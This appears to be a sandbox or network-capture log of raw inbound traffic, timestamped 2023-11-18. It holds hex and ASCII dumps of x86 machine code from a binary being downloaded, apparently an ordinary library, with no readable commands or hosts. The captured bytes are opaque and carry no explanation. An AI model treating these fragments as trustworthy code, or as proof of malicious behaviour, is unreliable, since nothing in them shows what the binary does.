2023-11-18 09:02:39 UTC	895	IN	Data Raw: 0c ff 75 08 e8 6c ff ff ff 83 c4 10 5d c3 8b ff 55 8b ec 56 8b 75 08 85 f6 75 15 e8 ce 10 ff ff c7 00 16 00 00 00 e8 bd 46 ff ff 83 c8 ff eb 51 8b 46 0c 57 83 cf ff c1 e8 0d a8 01 74 39 56 e8 a8 e2 ff ff 56 8b f8 e8 2e e4 ff ff 56 e8 8b 86 ff ff 50 e8 11 0b 00 00 83 c4 10 85 c0 79 05 83 cf ff eb 13 83 7e 1c 00 74 0d ff 76 1c e8 a3 38 ff ff 83 66 1c 00 59 56 e8 07 0c 00 00 59 8b c7 5f 5e 5d c3 6a 10 68 00 e1 13 10 e8 21 da fe ff 8b 75 08 89 75 e0 33 c0 85 f6 0f 95 c0 85 c0 75 15 e8 48 10 ff ff c7 00 16 00 00 00 e8 37 46 ff ff 83 c8 ff eb 3b 8b 46 0c c1 e8 0c 56 a8 01 74 08 e8 be 0b 00 00 59 eb e8 83 65 e4 00 e8 45 87 ff ff 59 83 65 fc 00 56 e8 31 ff ff ff 59 8b f0 89 75 e4 c7 45 fc fe ff ff ff e8 0b 00 00 00 8b c6 e8 01 da fe ff c3 8b 75 e4 ff 75 e0 e8 29 Data Ascii: ul]UVuuFQFWt9VV.VPy~tv8fYVY_^]jh!uu3uH7F;FVtYeEYeV1YuEuu)
2023-11-18 09:02:39 UTC	899	IN	Data Raw: da 83 d8 00 89 44 24 10 89 54 24 0c 8b 44 24 18 0b c0 7d 13 8b 54 24 14 f7 d8 f7 da 83 d8 00 89 44 24 18 89 54 24 14 0b c0 75 1b 8b 4c 24 14 8b 44 24 10 33 d2 f7 f1 8b 44 24 0c f7 f1 8b c2 33 d2 4f 79 4e eb 53 8b d8 8b 4c 24 14 8b 54 24 10 8b 44 24 0c d1 eb d1 d9 d1 ea d1 d8 0b db 75 f4 f7 f1 8b c8 f7 64 24 18 91 f7 64 24 14 03 d1 72 0e 3b 54 24 10 77 08 72 0e 3b 44 24 0c 76 08 2b 44 24 14 1b 54 24 18 2b 44 24 0c 1b 54 24 10 4f 79 07 f7 da f7 d8 83 da 00 5f 5b c2 10 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 08 8b 4c 24 10 0b c8 8b 4c 24 0c 75 09 8b 44 24 04 f7 e1 c2 10 00 53 f7 e1 8b d8 8b 44 24 08 f7 64 24 14 03 d8 8b 44 24 08 f7 e1 03 d3 5b c2 10 00 cc cc cc cc cc cc cc cc cc cc cc cc 51 8d 4c 24 08 2b c8 83 e1 0f 03 c1 1b c9 0b c1 59 e9 fa Data Ascii: D$T$D$}T$D$T$uL$D$3D$3OyNSL$T$D$ud$d$r;T$wr;D$v+D$T$+D$T$Oy_[D$L$L$uD$SD$d$D$[QL$+Y
2023-11-18 09:02:39 UTC	903	IN	Data Raw: c4 0c 8b 4d fc 33 cd e8 c7 ae fe ff 8b e5 5d c3 0f 1f 00 32 61 01 10 07 61 01 10 53 62 01 10 9d 61 01 10 cc cc cc cc 55 8b ec 83 e4 f8 83 ec 0c 53 8b 5d 10 56 8b 75 08 57 8b 0b 0f b7 41 08 83 e0 3f 0f b6 80 38 bc 13 10 48 83 f8 03 0f 87 e8 00 00 00 ff 24 85 2c 64 01 10 51 e8 57 03 0d 00 83 c4 04 dd 5c 24 10 f2 0f 10 44 24 10 e8 04 ee 0f 00 8b f8 8b da 8b cf e8 4a ef 0f 00 f2 0f 10 4c 24 10 66 0f 2e c8 9f f6 c4 44 0f 8a aa 00 00 00 53 57 56 e8 ee fc 0c 00 83 c4 0c 5f 5e 5b 8b e5 5d c3 e8 1f 7d 0d 00 52 50 56 e8 d7 fc 0c 00 83 c4 0c 5f 5e 5b 8b e5 5d c3 51 e8 e7 03 0d 00 8b f8 83 c4 04 85 ff 74 72 ff 33 e8 87 03 0d 00 83 c4 04 83 f8 08 75 63 ff 77 04 ff 37 56 e8 a4 fc 0c 00 83 c4 0c 5f 5e 5b 8b e5 5d c3 51 e8 74 01 0d 00 8b f8 83 c4 04 85 ff 74 3f ff 33 e8 Data Ascii: M3]2aaSbaUS]VuWA?8H$,dQW\$D$JL$f.DSWV_^[]}RPV_^[]Qtr3ucw7V_^[]Qtt?3
2023-11-18 09:02:39 UTC	907	IN	Data Raw: 8b c1 c1 e8 08 88 4d fb 8b ce 88 45 fa e8 70 01 00 00 8b 46 14 83 c4 04 25 f8 01 00 00 3d c0 01 00 00 74 20 6a 01 ba c0 26 13 10 8b ce e8 50 01 00 00 8b 46 14 83 c4 04 25 f8 01 00 00 3d c0 01 00 00 75 e0 6a 08 8d 55 f4 8b ce e8 32 01 00 00 83 c4 04 33 c0 8b d0 b9 03 00 00 00 83 e2 03 2b ca 8b d0 c1 ea 02 c1 e1 03 8b 14 96 d3 ea 88 54 05 e0 40 83 f8 14 72 dd 33 d2 0f 1f 84 00 00 00 00 00 0f b6 4c 15 e0 8b c1 83 e1 0f c1 e8 04 0f b6 80 30 b3 13 10 88 04 57 0f b6 81 30 b3 13 10 88 44 57 01 42 83 fa 14 72 d8 8b 4d fc c6 04 57 00 33 cd 5f 5e e8 94 9d fe ff 8b e5 5d c3 cc cc cc cc 55 8b ec 83 e4 f8 83 ec 54 a1 04 10 14 10 33 c4 89 44 24 50 8b 45 0c 56 8b 75 08 85 c0 74 4c 8d 4c 24 20 c7 44 24 08 00 00 00 00 89 4c 24 0c 8d 4d 10 51 50 8d 44 24 10 c7 44 24 18 32 Data Ascii: MEpF%=t j&PF%=ujU23+T@r3L0W0DWBrMW3_^]UT3D$PEVutLL$ D$L$MQPD$D$2
2023-11-18 09:02:39 UTC	913	IN	Data Raw: f0 03 cb 33 45 fc 33 45 b0 33 45 ac 8b 5d f8 d1 c0 89 45 b8 8b c7 33 c3 89 4d f4 33 c6 c1 c1 05 03 4d b8 81 c6 a1 eb d9 6e 03 c8 c1 cb 02 8b 45 d0 03 ca 33 45 cc 33 45 c4 33 45 b4 8b 55 f4 d1 c0 89 45 d0 8b c7 33 c2 89 4d fc c1 c1 05 33 c3 03 4d d0 03 c8 c1 ca 02 8b 45 f0 03 ce 33 45 e8 33 45 c0 33 45 ec 89 4d f4 d1 c0 81 c7 a1 eb d9 6e 8b 75 fc 89 45 f0 8b c6 33 c2 c1 c1 05 03 4d f0 33 c3 03 c8 c1 ce 02 8b 45 b8 03 cf 33 45 bc 81 c3 a1 eb d9 6e 33 45 e0 33 45 b4 8b 7d f4 d1 c0 89 45 c8 8b c6 33 c2 89 4d f8 33 c7 c1 c1 05 03 4d c8 81 c2 a1 eb d9 6e 03 c1 c1 cf 02 8b 4d d0 03 c3 33 4d e4 33 4d dc 33 4d ec 8b 5d f8 89 45 fc d1 c1 89 4d ec 8b c8 c1 c1 05 8b c3 03 4d ec 33 c6 33 c7 c1 cb 02 03 c8 81 c6 a1 eb d9 6e 8b 45 f0 03 ca 33 45 b0 33 45 d8 33 45 e0 8b Data Ascii: 3E3E3E]E3M3MnE3E3E3EUE3M3ME3E3E3EMnuE3M3E3En3E3E}E3M3MnM3M3M3M]EMM33nE3E3E3E
2023-11-18 09:02:39 UTC	917	IN	Data Raw: 83 ff 5b 75 17 8b ce e8 64 04 00 00 3c 3a 75 1a b8 64 26 13 10 5f 5e 5b 8b e5 5d c3 83 ff 5c 75 09 8b ce e8 68 04 00 00 8b f8 8b ce e8 3f 04 00 00 8b 56 2c 57 3c 2d 75 2d 6a 0a e8 60 06 00 00 8b 46 18 ff 46 04 56 ff d0 8b f8 83 c4 0c 83 ff 5c 75 09 8b ce e8 36 04 00 00 8b f8 8b 56 2c 8b ce 57 6a 0a eb 02 6a 09 e8 33 06 00 00 83 c4 08 8b ce e8 f9 03 00 00 3c 5d 74 1f 8b 46 18 56 ff d0 8b f8 83 c4 04 85 ff 0f 85 72 ff ff ff b8 8c 26 13 10 5f 5e 5b 8b e5 5d c3 ff 46 04 85 ff 74 ed 8b 4e 2c 8b 46 14 2b cb 89 0c 98 e9 a8 00 00 00 8b ce e8 b8 03 00 00 0f b6 c0 83 c0 bc 83 f8 33 77 7e 0f b6 80 dc 92 01 10 ff 24 85 bc 92 01 10 ff 46 04 b8 11 00 00 00 8b 55 f8 6a 00 50 eb 70 ff 46 04 b8 0d 00 00 00 8b 55 f8 6a 00 50 eb 60 ff 46 04 b8 0e 00 00 00 8b 55 f8 6a 00 50 Data Ascii: [ud<:ud&_^[]\uh?V,W<-u-j`FFV\u6V,Wjj3<]tFVr&_^[]FtN,F+3w~$FUjPpFUjP`FUjP
2023-11-18 09:02:39 UTC	993	IN	Data Raw: 01 7e 2c 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 ff 75 08 52 8b 51 2c e8 10 00 00 00 83 c4 08 59 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b f1 57 8b fa 8b 56 30 3b 56 2c 77 11 03 d2 e8 58 00 00 00 85 c0 74 06 33 c0 5f 5e 5d c3 8b 56 2c 3b d7 7e 21 0f 1f 80 00 00 00 00 8b 4e 10 8a 44 11 ff 88 04 11 8b 46 14 8d 0c 90 4a 8b 41 fc 89 01 3b d7 7f e6 8b 4e 10 ff 46 2c 8a 45 08 88 04 0f 8b 4e 14 8b 45 0c 89 04 b9 8b c7 5f 5e 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 51 53 56 8b f1 57 8b fa 8b 5e 10 e8 7a fa 05 00 85 c0 75 46 50 57 8b cb e8 2d 80 0f 00 83 c4 08 85 c0 74 36 8b 5e 14 89 46 10 e8 5b fa 05 00 85 c0 75 27 8d 04 bd 00 00 00 00 8b cb 6a 00 50 e8 06 80 0f 00 83 c4 08 85 c0 74 0f 89 46 14 33 c0 89 7e 30 5f Data Ascii: ~,_^[]UQuRQ,Y]UVWV0;V,wXt3_^]V,;~!NDFJA;NF,ENE_^]UQSVW^zuFPW-t6^F[u'jPtF3~0_
2023-11-18 09:02:39 UTC	997	IN	Data Raw: 5f 5e 33 c0 5b 8b e5 5d c3 cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 53 56 57 8b 7d 0c 33 d2 83 ce ff c7 45 f8 ff ff ff ff 33 db 89 75 f4 8b 0f 3b ca 8b 47 04 89 4d fc 8b ca 7e 41 33 ff 0f 1f 00 8b 08 83 f9 08 7c 20 83 c1 f8 be 01 00 00 00 d3 e6 80 78 05 00 75 04 0b fe eb 0c 80 78 04 02 75 06 89 54 8d f4 0b de 42 83 c0 0c 3b 55 fc 7c d0 8b 75 f4 89 7d fc 8b 7d 0c 8b 4d fc f7 d3 85 d9 74 0c 5f 5e b8 13 00 00 00 5b 8b e5 5d c3 85 f6 79 10 c7 47 14 00 00 00 00 33 c0 5f 5e 5b 8b e5 5d c3 8b 47 10 f2 0f 10 05 f0 cc 13 10 8b 4d f8 f2 0f 11 47 28 c7 04 f0 01 00 00 00 8b 47 10 c6 44 f0 04 01 85 c9 79 10 c7 47 14 01 00 00 00 33 c0 5f 5e 5b 8b e5 5d c3 8b 47 10 c7 04 c8 02 00 00 00 8b 47 10 c6 44 c8 04 01 33 c0 c7 47 14 03 00 00 00 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc Data Ascii: _^3[]USVW}3E3u;GM~A3\| xuxuTB;U\|u}}Mt_^[]yG3_^[]GMG(GDyG3_^[]GGD3G_^[]
2023-11-18 09:02:39 UTC	1001	IN	Data Raw: 05 8b 41 10 eb 10 f6 c2 01 74 04 33 c0 eb 07 b2 01 e8 65 1c 0d 00 8d 4c 24 10 c7 44 24 10 00 00 00 00 57 51 8b d0 8d 4c 24 20 e8 4c 11 00 00 83 c4 08 8b c8 80 7c 24 2c 00 75 4a 80 7c 24 2d 00 75 58 85 c9 74 18 83 7c 24 10 00 75 07 83 7c 24 14 00 74 0a 80 49 01 08 8d 46 01 89 41 08 83 c6 02 3b f3 0f 82 72 ff ff ff 8b 4c 24 20 f6 41 01 08 74 1a 8b 51 08 8b 45 10 8b 0f 8b 14 90 e8 e8 20 0d 00 eb 15 57 e8 40 a3 0c 00 eb 0a ff 75 10 8b d7 e8 c4 27 00 00 83 c4 04 ff 74 24 20 e8 b8 61 0f 00 83 c4 04 c7 44 24 20 00 00 00 00 c7 44 24 18 00 00 00 00 c7 44 24 1c 00 00 00 00 ff 74 24 28 e8 94 61 0f 00 83 c4 04 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 83 ec 24 53 8b 5d 0c 56 57 83 fb 01 0f 8c 59 01 00 00 f6 c3 01 75 3c 68 00 be 12 10 68 d4 Data Ascii: At3eL$D$WQL$ L\|$,uJ\|$-uXt\|$u\|$tIFA;rL$ AtQE W@u't$ aD$ D$D$t$(a_^[]U$S]VWYu<hh
2023-11-18 09:02:39 UTC	1005	IN	Data Raw: 44 24 0c c7 44 24 10 64 00 00 00 c7 44 24 14 00 00 00 00 66 0f 13 44 24 18 e8 48 1d 00 00 8d 4c 24 08 e8 7f 1c 00 00 8b 06 b9 00 80 00 00 5e 66 09 48 08 8b 8c 24 88 00 00 00 33 cc c6 40 0b 4a e8 2d 49 fe ff 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 53 8b 59 04 57 bf 02 00 00 00 89 4d fc 3b df 7c 3a 56 8d 04 7f 8d 34 81 8a 06 84 c0 74 10 3c 07 75 10 8b ce e8 d3 ff ff ff 8b 4d fc eb 04 80 4e 01 04 80 3e 06 72 08 8b 46 04 83 c0 02 eb 05 b8 02 00 00 00 03 f8 3b fb 7e c8 5e 5f 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 56 57 52 68 d4 22 13 10 8b f9 e8 7b 26 0f 00 8b 0f 8b f0 6a ff 6a 01 6a ff 6a ff 8b d6 c7 47 14 01 00 00 00 e8 01 0d 0d 00 56 e8 eb 50 0f 00 83 c4 1c 5f 5e 8b e5 5d c3 cc cc 55 8b ec 83 e4 f8 51 c7 04 Data Ascii: D$D$dD$fD$HL$^fH$3@J-I]UQSYWM;\|:V4t<uMN>rF;~^_[]UVWRh"{&jjjjGVP_^]UQ
2023-11-18 09:02:39 UTC	1009	IN	Data Raw: 47 04 5f 5e 5b 8b e5 5d c3 3c 74 75 4a 6a 04 68 5c 9a 12 10 51 e8 d7 78 fe ff 83 c4 0c 85 c0 0f 85 5b ff ff ff 8b 4c 24 14 0f b6 41 04 f6 80 70 5d 13 10 06 0f 85 46 ff ff ff 6a 00 6a 00 ba 01 00 00 00 8b cb e8 77 01 00 00 83 c4 08 8d 47 04 5f 5e 5b 8b e5 5d c3 3c 66 75 4a 6a 05 68 64 9a 12 10 51 e8 89 78 fe ff 83 c4 0c 85 c0 0f 85 0d ff ff ff 8b 4c 24 14 0f b6 41 05 f6 80 70 5d 13 10 06 0f 85 f8 fe ff ff 6a 00 6a 00 ba 02 00 00 00 8b cb e8 29 01 00 00 83 c4 08 8d 47 05 5f 5e 5b 8b e5 5d c3 3c 2d 74 39 3c 30 7c 04 3c 39 7e 31 3c 7d 75 0c b8 fe ff ff ff 5f 5e 5b 8b e5 5d c3 3c 5d 75 0c b8 fd ff ff ff 5f 5e 5b 8b e5 5d c3 84 c0 0f 85 a7 fe ff ff 33 c0 5f 5e 5b 8b e5 5d c3 32 e4 32 c9 3c 30 7f 1f 8d 57 01 3c 2d 74 02 8b d7 80 3c 32 30 75 10 8a 44 32 01 3c 30 Data Ascii: G_^[]<tuJjh\Qx[L$Ap]FjjwG_^[]<fuJjhdQxL$Ap]jj)G_^[]<-t9<0\|<9~1<}u_^[]<]u_^[]3_^[]22<0W<-t<20uD2<0
2023-11-18 09:02:39 UTC	1013	IN	Data Raw: 13 56 14 3b 56 0c 72 14 77 05 3b 46 08 72 0d 8b d7 8b ce e8 94 00 00 00 85 c0 75 30 8d 45 14 50 ff 75 10 8b 46 04 03 46 10 50 57 e8 6c 05 0f 00 8b 46 04 83 c4 10 03 46 10 8d 50 01 8a 08 40 84 c9 75 f9 2b c2 99 01 46 10 11 56 14 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 53 56 8b f1 8b da 57 8b 7d 08 8b 4e 10 8b 46 14 03 cf 83 d0 00 3b 46 0c 72 14 77 05 3b 4e 08 72 0d 8b d7 8b ce e8 23 00 00 00 85 c0 75 18 8b 46 04 03 46 10 57 53 50 e8 a1 6b ff ff 83 c4 0c 01 7e 10 83 56 14 00 5f 5e 5b 5d c3 cc cc 55 8b ec 83 e4 f8 51 53 56 8b f1 33 c0 57 8b 5e 0c 8b 7e 08 3b c3 77 0e 72 04 3b d7 73 08 0f a4 fb 01 03 ff eb 09 03 fa 13 d8 83 c7 0a 13 d8 38 46 18 74 5b 38 46 19 74 0c b8 01 00 00 00 5f 5e 5b 8b e5 5d c3 e8 a6 a7 05 00 85 c0 75 75 8b c7 0b c3 74 Data Ascii: V;Vrw;Fru0EPuFFPWlFFP@u+FV_^]USVW}NF;Frw;Nr#uFFWSPk~V_^[]UQSV3W^~;wr;s8Ft[8Ft_^[]uut
2023-11-18 09:02:39 UTC	1018	IN	Data Raw: 33 c0 c7 47 20 00 00 00 00 85 f6 75 2e 85 c0 75 43 53 e8 60 6f 0c 00 8b f0 83 c4 04 33 db 85 f6 75 19 ff 77 0c ff 77 10 68 34 22 13 10 e8 85 f5 0e 00 83 c4 0c 89 47 08 8d 73 01 33 ff 53 e8 34 6f 0c 00 8b 45 0c 83 c4 04 89 38 8b c6 5f 5e 5b 8b e5 5d c3 8b c8 e8 5c 65 00 00 8b f0 89 74 24 10 85 f6 75 d6 8b 74 24 18 8d 4c 24 10 8b 46 0c 8b 40 0c c1 e0 04 83 c0 58 99 52 50 e8 c6 af 01 00 8b f8 83 c4 08 85 ff 74 2a 89 77 08 8d 57 58 89 5f 04 89 57 24 8b 4e 0c 8b 74 24 10 8b 49 0c 8d 04 ca 89 47 28 8b 45 0c 89 38 8b c6 5f 5e 5b 8b e5 5d c3 8b 74 24 10 eb 83 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 8b 55 0c 53 56 83 cb ff 33 f6 8b 02 0b cb 57 33 ff 89 4d fc 89 45 f8 85 c0 7e 65 8b 4a 04 0b d3 0b fb 80 79 05 00 74 24 83 39 00 75 1f 8a 41 04 3c 02 Data Ascii: 3G u.uCS`o3uwwh4"Gs3S4oE8_^[]\et$ut$L$F@XRPt*wWX_W$Nt$IG(E8_^[]t$UUSV3W3ME~eJyt$9uA<
2023-11-18 09:02:39 UTC	1022	IN	Data Raw: 89 85 7c fe ff ff c7 85 80 fe ff ff 00 00 05 07 c7 85 84 fe ff ff 38 07 43 07 c7 85 88 fe ff ff 63 07 88 07 c7 85 8c fe ff ff 94 07 cb 07 c7 85 90 fe ff ff e8 07 f8 07 c7 85 94 fe ff ff 0c 08 3e 08 c7 85 98 fe ff ff 78 08 9e 08 c7 85 9c fe ff ff d8 08 ee 08 c7 85 a0 fe ff ff 28 09 4f 09 c7 85 a4 fe ff ff a8 09 b8 09 c7 85 a8 fe ff ff d4 09 24 0a c7 85 ac fe ff ff 6c 0a ac 0a c7 85 b0 fe ff ff de 0a 1a 0b c7 85 b4 fe ff ff 4e 0b 8a 0b c7 85 b8 fe ff ff a8 0b b8 0b c7 85 bc fe ff ff d4 0b 08 0d c7 85 c0 fe ff ff 80 0d 70 0e c7 85 c4 fe ff ff 80 0e 90 0e c7 85 c8 fe ff ff a0 0e b6 0e c7 85 cc fe ff ff f8 0e 38 0f c7 85 d0 fe ff ff 48 0f 58 0f c7 85 d4 fe ff ff 68 0f 80 0f c7 85 d8 fe ff ff a8 0f c8 0f c7 85 dc fe ff ff d8 0f 0a 10 c7 85 e0 fe ff ff 2a 10 4a Data Ascii: \|8Cc>x(O$lNp8HXh*J
2023-11-18 09:02:39 UTC	1025	IN	Data Raw: b6 80 7c 18 02 10 ff 24 85 60 18 02 10 83 fe 04 0f 8e 89 01 00 00 81 7c 1e fc 69 63 61 6c 0f 85 7b 01 00 00 6a 00 8d 56 fc e8 37 0d 00 00 83 c4 04 85 c0 0f 84 66 01 00 00 b8 69 63 00 00 66 89 44 1e fc 8d 46 fe 89 07 33 c0 5f 5e 5b c3 83 fe 04 0f 8e 48 01 00 00 81 7c 1e fc 6e 65 73 73 0f 85 3a 01 00 00 83 c6 fc 6a 00 8b d6 e8 f4 0c 00 00 83 c4 04 85 c0 0f 84 23 01 00 00 89 37 33 c0 5f 5e 5b c3 83 fe 05 0f 8e 12 01 00 00 b8 69 63 61 74 3b 44 1e fb 75 0b b8 65 00 00 00 3a 44 1e ff 74 1e b8 69 63 69 74 3b 44 1e fb 0f 85 ed 00 00 00 b8 69 00 00 00 3a 44 1e ff 0f 85 de 00 00 00 6a 00 8d 56 fb e8 9a 0c 00 00 83 c4 04 85 c0 0f 84 c9 00 00 00 b8 69 63 00 00 66 89 44 1e fb 8d 46 fd 89 07 33 c0 5f 5e 5b c3 83 fe 03 0f 8e ab 00 00 00 b8 66 75 00 00 66 3b 44 1e fd 0f Data Ascii: \|$`\|ical{jV7ficfDF3_^[H\|ness:j#73_^[icat;Due:Dticit;Di:DjVicfDF3_^[fuf;D
2023-11-18 09:02:39 UTC	1029	IN	Data Raw: ff ff c7 44 24 1c 01 00 00 00 eb cf 0f b6 c0 80 3c 30 00 75 06 43 e9 f5 fe ff ff 8b c3 2b 45 14 89 44 24 24 8a 03 3c 41 72 06 3c 5a 77 02 04 20 88 07 43 47 8b cb 2b 4d 14 89 4c 24 2c 3b da 0f 83 86 02 00 00 3b 7c 24 20 0f 86 97 00 00 00 8b 44 24 14 b9 02 00 00 00 f7 e9 8b f0 89 54 24 28 e8 4b 6a 05 00 85 c0 0f 85 8c 02 00 00 8b 4c 24 28 8b c6 0b c1 74 12 51 56 e8 f2 f3 0e 00 83 c4 08 89 44 24 10 8b d0 eb 06 33 d2 89 54 24 10 85 d2 0f 84 62 02 00 00 8b 75 08 8b c2 ff 74 24 14 8b 8e 80 00 00 00 2b c1 51 52 03 f8 e8 9f 2d ff ff ff b6 80 00 00 00 e8 24 f2 0e 00 8b 44 24 20 83 c4 10 8b 4c 24 14 8b 54 24 0c 03 c9 89 86 80 00 00 00 83 c0 fa 03 c1 89 4c 24 14 89 8e 84 00 00 00 89 44 24 20 8a 03 84 c0 0f 89 c5 01 00 00 0f b6 f0 43 81 fe c0 00 00 00 72 4c 0f b6 b6 Data Ascii: D$<0uC+ED$$<Ar<Zw CG+ML$,;;\|$ D$T$(KjL$(tQVD$3T$but$+QR-$D$ L$T$L$D$ CrL
2023-11-18 09:02:39 UTC	1033	IN	Data Raw: 73 18 8b 4b 04 8d 53 10 e8 0e 6b 00 00 8b d0 c7 43 08 00 00 00 00 83 c4 04 89 55 fc 85 d2 75 65 56 8b 75 08 89 16 89 56 04 8b 03 85 ff 79 2d 33 ff 39 78 0c 7e 3a 0f 1f 44 00 00 8b 53 18 8b 0c fa 01 0e 8b 4c fa 04 11 4e 04 47 8b 0b 3b 79 0c 7c e9 8b 45 fc 5e 5f 5b 8b e5 5d c3 3b 78 0c 7d 18 8b 4b 18 8b 04 f9 89 06 8b 44 f9 04 89 46 04 5e 5f 8b c2 5b 8b e5 5d c3 5e 5f b8 19 00 00 00 5b 8b e5 5d c3 5f 8b c2 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 8b 01 53 56 57 8b 40 0c 89 45 f8 8d 45 fc 89 55 f4 ba 08 00 00 00 6a 00 50 c7 45 fc 00 00 00 00 e8 65 1d 00 00 8b 7d fc 83 c4 08 85 ff 74 5f ff 75 0c bb 01 00 00 00 ff 75 08 53 57 e8 39 0d 0c 00 57 e8 03 1f 0c 00 83 c4 14 83 f8 64 75 28 6a 00 57 e8 03 1a 0c 00 6a 00 57 8b f0 e8 29 Data Ascii: sKSkCUueVuVy-39x~:DSLNG;y\|E^_[];x}KDF^_[]^_[]_[]USVW@EEUjPEe}t_uuSW9Wdu(jWjW)
2023-11-18 09:02:39 UTC	1037	IN	Data Raw: 10 00 74 49 a1 e8 41 14 10 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 8b 74 24 28 56 ff 15 f4 22 14 10 29 05 40 42 14 10 83 c4 04 ff 0d 64 42 14 10 56 ff 15 ec 22 14 10 a1 e8 41 14 10 83 c4 04 85 c0 74 16 50 ff 15 20 23 14 10 eb 0a ff 74 24 28 ff 15 ec 22 14 10 83 c4 04 ff 74 24 0c e8 d3 1f 0c 00 83 c4 04 85 ff 75 12 85 c0 75 10 8b cb e8 f1 01 00 00 5f 5e 5b 8b e5 5d c3 8b c7 5f 5e 5b 8b e5 5d c3 cc 55 8b ec 83 e4 f8 83 ec 08 56 57 8b f9 8b 37 c7 47 08 00 00 00 00 8b 56 08 8b 46 04 52 50 52 50 68 34 20 13 10 6a 00 ff 36 e8 a2 0c 00 00 83 c4 1c 85 c0 0f 85 b3 00 00 00 39 46 2c 74 1e ff 76 08 ff 76 04 68 68 20 13 10 50 ff 36 e8 7f 0c 00 00 83 c4 14 85 c0 0f 85 90 00 00 00 8b 4f 04 e8 dc 61 00 00 85 c0 0f 85 80 00 00 00 50 89 44 24 10 ba 09 00 00 00 8d 44 24 Data Ascii: tIAtP#t$(V")@BdBV"AtP #t$("t$uu_^[]_^[]UVW7GVFRPRPh4 j69F,tvvhh P6OaPD$D$
2023-11-18 09:02:39 UTC	1041	IN	Data Raw: 00 00 85 c0 75 6d 8b ce e8 04 57 01 00 85 c0 75 62 8b ce e8 79 b5 ff ff 85 c0 75 57 8b d7 8b ce e8 dc 92 ff ff 85 c0 75 4a 50 50 50 50 50 68 20 5a 02 10 56 6a 01 6a 01 ba ec 1c 13 10 8b cf e8 1d 19 05 00 83 c4 24 85 c0 75 28 50 50 50 50 50 68 c0 59 02 10 56 6a 01 50 ba f4 1c 13 10 8b cf e8 fc 18 05 00 83 c4 24 5f 5e 8b e5 5d c3 b8 07 00 00 00 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 53 8b 5d 08 56 57 33 ff 0f 1f 44 00 00 8b 87 30 5b 13 10 85 db 75 17 f7 d8 1b c0 85 c0 74 2d 83 c7 04 83 ff 14 72 e6 5f 5e 33 c0 5b 5d c3 85 c0 74 ed 8b f0 8b d3 2b f3 0f 1f 44 00 00 0f b6 02 0f b6 0c 16 3b c1 75 0e 85 c0 75 1c 5f 5e b8 01 00 00 00 5b 5d c3 0f b6 89 80 72 13 10 0f b6 80 80 72 13 10 2b c1 75 b3 42 eb d2 cc cc 55 8b ec 83 e4 f8 51 56 8b 75 08 ba 88 1c Data Ascii: umWubyuWuJPPPPPh ZVjj$u(PPPPPhYVjP$_^]_^]US]VW3D0[ut-r_^3[]t+D;uu_^[]rr+uBUQVu
2023-11-18 09:02:39 UTC	1045	IN	Data Raw: 85 c0 74 05 03 45 fc eb 02 33 c0 8b 4d 14 89 46 04 8b 45 18 50 51 56 ff 75 08 c7 01 00 00 00 00 c7 00 00 00 00 00 e8 11 00 00 00 83 c4 10 8b c7 5f 5e 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 57 8b 7d 0c 8b 0f 3b 4f 04 72 15 8b 45 10 5f c7 00 ff ff ff ff 8b 45 14 c7 00 ff ff ff ff 5d c3 53 56 8d 55 0c e8 d3 98 ff ff 01 07 8b 45 0c 8b 37 8b 5d 14 83 f8 01 75 2b 8d 55 0c 8b ce e8 ba 98 ff ff 8b 4d 10 8d 55 0c 03 c6 89 07 8b 45 0c 89 01 c7 03 00 00 00 00 8b 0f e8 9e 98 ff ff 01 07 8b 45 0c 83 c0 fe 01 03 5e 5b 5f 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 55 08 8b 4a 64 85 c9 74 0e 8b 52 60 39 11 74 0b 8b 49 0c 85 c9 75 f5 33 c0 5d c3 83 7d 0c 00 8b 41 04 74 f5 c7 41 04 00 00 00 00 c7 41 08 00 00 00 00 5d c3 cc cc cc cc cc cc cc cc 55 8b ec Data Ascii: tE3MFEPQVu_^]UW};OrE_E]SVUE7]u+UMUEE^[_]UUJdtR`9tIu3]}AtAA]U
2023-11-18 09:02:39 UTC	1050	IN	Data Raw: 8b 40 0c eb 0c 8b 46 34 8b 40 08 8b 48 10 8b 40 14 50 51 6a 01 ff 37 e8 eb cb 0b 00 8b 43 0c ff 40 40 ff 37 e8 ae dd 0b 00 8b 4b 0c 83 c4 14 ff 49 40 83 f8 64 75 0d 83 66 3c fd 33 c0 5f 5e 5b 8b e5 5d c3 ff 37 e8 5c ee 0b 00 8b f0 83 c4 04 85 f6 75 0c b8 0b 01 00 00 5f 5e 5b 8b e5 5d c3 8b 43 0c 83 78 68 00 74 20 ff 30 e8 97 ec 04 00 83 c4 04 50 68 10 8c 12 10 e8 39 75 0e 00 8b 4b 0c 83 c4 08 8b 49 68 89 01 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc 55 8b ec 8b 4d 08 8b 41 18 48 83 f8 03 77 4c ff 24 85 e4 7a 02 10 8b 45 0c c7 00 00 00 00 00 c7 40 04 00 00 00 00 33 c0 5d c3 8b 41 38 85 c0 74 12 8b 48 08 8b 50 0c 8b 45 0c 89 08 89 50 04 33 c0 5d c3 8b 41 34 8b 40 08 8b 48 10 8b 50 14 8b 45 0c 89 08 89 50 04 33 c0 5d c3 6a 00 ff 71 30 e8 eb d3 0b 00 8b 4d 0c Data Ascii: @F4@H@PQj7C@@7KI@duf<3_^[]7\u_^[]Cxht 